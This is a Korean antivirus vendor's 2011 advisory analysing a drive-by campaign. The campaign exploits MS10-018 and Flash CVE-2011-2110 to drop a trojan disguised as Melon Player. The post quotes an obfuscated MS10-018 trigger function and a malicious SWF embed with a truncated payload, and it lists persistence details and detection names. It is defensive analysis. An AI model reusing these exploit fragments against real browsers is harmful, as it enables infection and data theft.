분석 정보/악성코드 분석 정보

[주의]Melon Player로 위장한 악성파일 유포중

TACHYON & ISARC 2011. 6. 30. 11:23
1. 개 요


최근 Flash Player 취약점을 이용해 추가적인 악성파일 다운로드 및 실행을 시도하는 형태의 악성파일 유포 기법이 기승을 부리고 있다. 이러한 취약점을 악용한 악성파일에 감염되면 사용자들이 인지하지 못하는 상태에서 여러 형태의 악성 동작을 유발할 수 있기 때문에 각별한 주의가 요망되고 있다. 또한, 해당 취약점을 악용하는 악성파일 감염에 의해 다운로드 될 수 있는 추가적인 악성파일은 이번 글을 통해 언급될 파일처럼 국내 유명 음악 서비스 플레이어로 위장하는 경우도 있으며, 현재도 지속적으로 유포중에 있다.

[주의]윈도우 시스템 파일을 교체하는 악성파일 변종 증가
http://erteam.nprotect.com/173

[주의]국내 소셜커머스 웹 사이트 변조로 악성파일 다량 전파
http://erteam.nprotect.com/170

2. 감염 경로 및 증상

국내 유명 음악 서비스 플레이어로 위장한 악성파일은 Flash Player 취약점(CVE-2011-2110)을 악용하는 SWF 악성파일에 의해 추가적으로 다운로드 되어 사용자들의 PC에 설치될 수 있다.

최초 유포는 아래의 URL과 같이 특정사이트에 삽입된 스크립트 파일에 의해 시작되었으며 Internet Explorer, Adobe Flash Player 버전 등을 체크하여 추가적인 동작을 진행하게 된다.

※ Melon Player 악성파일 유포를 위한 악성 스크립트

  - http://(생략)/share/a1.html

◆ 악성 스크립트가 포함된 html, SWF 파일

아래의 그림은 a1.html 파일의 내부 코드이며 IE, Flash Player 버전 정보 체크, 각 버전에 따른 SWF 파일 매칭 실행 등에 대한 루틴을 보여주고 있다.

 


아래의 URL은 추가적으로 다운로드 될 수 있는 악성 스크립트 파일에 대한 목록이다.

※ 추가 악성 스크립트 파일 다운로드 URL 목록

  - http://(생략)/share/a1.html
  - http://(생략)/share/a2.html (MS10-018 취약점)
  - http://(생략)/share/a3.html (CVE-2011-2110 취약점)

a2.html, a3.html 파일은 각각 내부에 MS10-018 취약점,  CVE-2011-2110 취약점 활용 코드를 가지고 있다.
  

■ MS10-018 취약점 (a2.html)


function sclick()
{
var zmaqwekjsax = document.createElement("B"+"O"+"D"+"Y");
zmaqwekjsax.addBehavior("#"+"d"+"e"+"f"+"a"+"u"+"l"+"t"+"#"+"u"+"s"+"e"+"r"+"Da"+"t"+"a");
document.appendChild(zmaqwekjsax);
try
{
for (i=0;i<10;i++)
{
zmaqwekjsax.setAttribute('s',window);
}
}
catch(e)
{}
window.status+='';
}

■ CVE-2011-2110 취약점 (a3.html)


<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="550" height="400" id="test" align="middle">
    <param name="movie" value="basic.swf?info=02E6B(생략)B51D3527B7AF28B7394" />
    <param name="quality" value="high" />
    <param name="bgcolor" value="#ffffff" />
    <param name="play" value="true" />
    <param name="loop" value="true" />
    <param name="wmode" value="window" />
    <param name="scale" value="showall" />
    <param name="menu" value="true" />
    <param name="devicefont" value="false" />
    <param name="salign" value="" />
    <param name="allowScriptAccess" value="sameDomain" />
    <!--[if !IE]>-->
    <object type="application/x-shockwave-flash" data="basic.swf?info=02E6B(생략)B7394" width="550" height="400">
     <param name="movie" value="basic.swf?info=02E6B(생략)B51D3527B7AF28B7394" />
     <param name="quality" value="high" />
     <param name="bgcolor" value="#ffffff" />
     <param name="play" value="true" />
     <param name="loop" value="true" />
     <param name="wmode" value="window" />
     <param name="scale" value="showall" />
     <param name="menu" value="true" />
     <param name="devicefont" value="false" />
     <param name="salign" value="" />
     <param name="allowScriptAccess" value="sameDomain" />


아래의 그림은 악성 스크립트에 의해 실행될 수 있는 악성 코드를 포함한 SWF 파일의 내부 코드이다. 또한, 내부에 포함된 각각의 Shellcode 정보(라이브러리 로드, Melon Player 위장 악성파일 다운로드)를 디코딩한 화면과 함께 보여주고 있다.


※ Adobe Flash Player 최신 보안 패치 URL

http://www.adobe.com/go/getflash


◆ Melon Player 3.0 으로 위장한 악성파일

취약점을 사용한 악성 스크립트 및 SWF 파일에 의해 최종적으로 "fatt.txt" 파일이 다운로드 된다. 해당 파일은 txt 형식의 파일로 보일 수 있으나 복호화 과정을 거친 후 최종적으로 감염이 가능한 exe형태의 파일로 변환된다.

아래의 그림은 Melon Player 3.0 으로 위장한 악성파일과 정상 Melon Player 설치본에 대한 속성 비교 화면이다.

 

정상 Melon Player 설치본은 위 그림과 같이 "MelonSetup"이라는 파일명을 가지며, 통합적 설치본이기 때문에 별도의 버전 설명 부분을 참조하지 않고 있다.

복호화 과정을 거친 "fatt.txt"파일에 감염되면 아래의 설명 부분과 같이 자신의 복사본을 생성하게 되며, 추가적인 레지스트리 값 등록이 진행될 수 있다.

※ 생성 파일

  - C:\WINDOWS\winntp\cr.exe (239,108 바이트)

※ 레지스트리 값 등록

  - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  - 이   름 : HKLM
  - 데이터 : "C:\WINDOWS\winntp\cr.exe"


또한, 해당 파일이 실행되면 아래의 그림과 같이 외부 사이트와 지속적인 세션 연결 상태를 유지하여 경우에 따라서 백도어 기능, 추가적인 악성파일 다운로드, 수집된 정보의 발송 등과 같은 역할(?)을 수행할 수 있다.


3. 예방 조치 방법

위와 같이 취약점을 이용하는 악성파일의 경우 최근 특정 온라인 게임 계정 정보 탈취를 목적으로 하는 악성파일을 중심으로 다양한 변종이 지속적으로 유포되는 양상을 보이고 있다. 주로 웹 하드 , 각종 커뮤니티 , 소셜커머스 사이트 등을 주요 유포 경로로 하고 있어 다양한 범위의 유포 분포도를 보이고 있으며, 일반 사용자 몰래 동작되기 때문에 감염 사실을 인지하기가 어렵다는 점이 특징이다.

이러한 악성파일로 부터 안전하기 위해서는 아래와 같은 "보안 관리 수칙"을 준수하는 등 사용자 스스로 주의와 관심을 가지는 것이 무엇보다 중요하다고 할 수 있다.

※ 보안 관리 수칙

1. 윈도우와 같은 OS 및 각종 응용 프로그램의 최신 보안 패치 생활화.

2. 신뢰할 수 있는 보안업체에서 제공하는 백신을 최신 엔진 및 패턴버전으로 업데이트해 실시간 감시 기능을 항상 "ON"상태로 유지하여 사용한다.

3. 출처가 불분명한 이메일에 대한 열람 및 첨부파일에 대한 다운로드/실행을 자제한다.

4. 인스턴트 메신저, SNS 등을 통해 접근이 가능한 링크 접속시 주의


※ 잉카인터넷(시큐리티대응센터/대응팀)에서는 위와 같은 악성파일에 대해 아래와 같은 진단/치료 기능을 제공하고 있으며, 각종 보안 위협에 대비하기 위해 24시간 지속적인 대응체계를 유지하고 있다.

◆ 진단명

- Script-JS/W32.Agent.AAD
- Script-JS/W32.Agent.CGF
- Script-JS/W32.Agent.CHI
- Trojan-Exploit/W32.SWFlash.3436
- Trojan-Exploit/W32.SWFlash.3437.B
- Trojan/W32.Buzus.239108
- Trojan/W32.Buzus.239108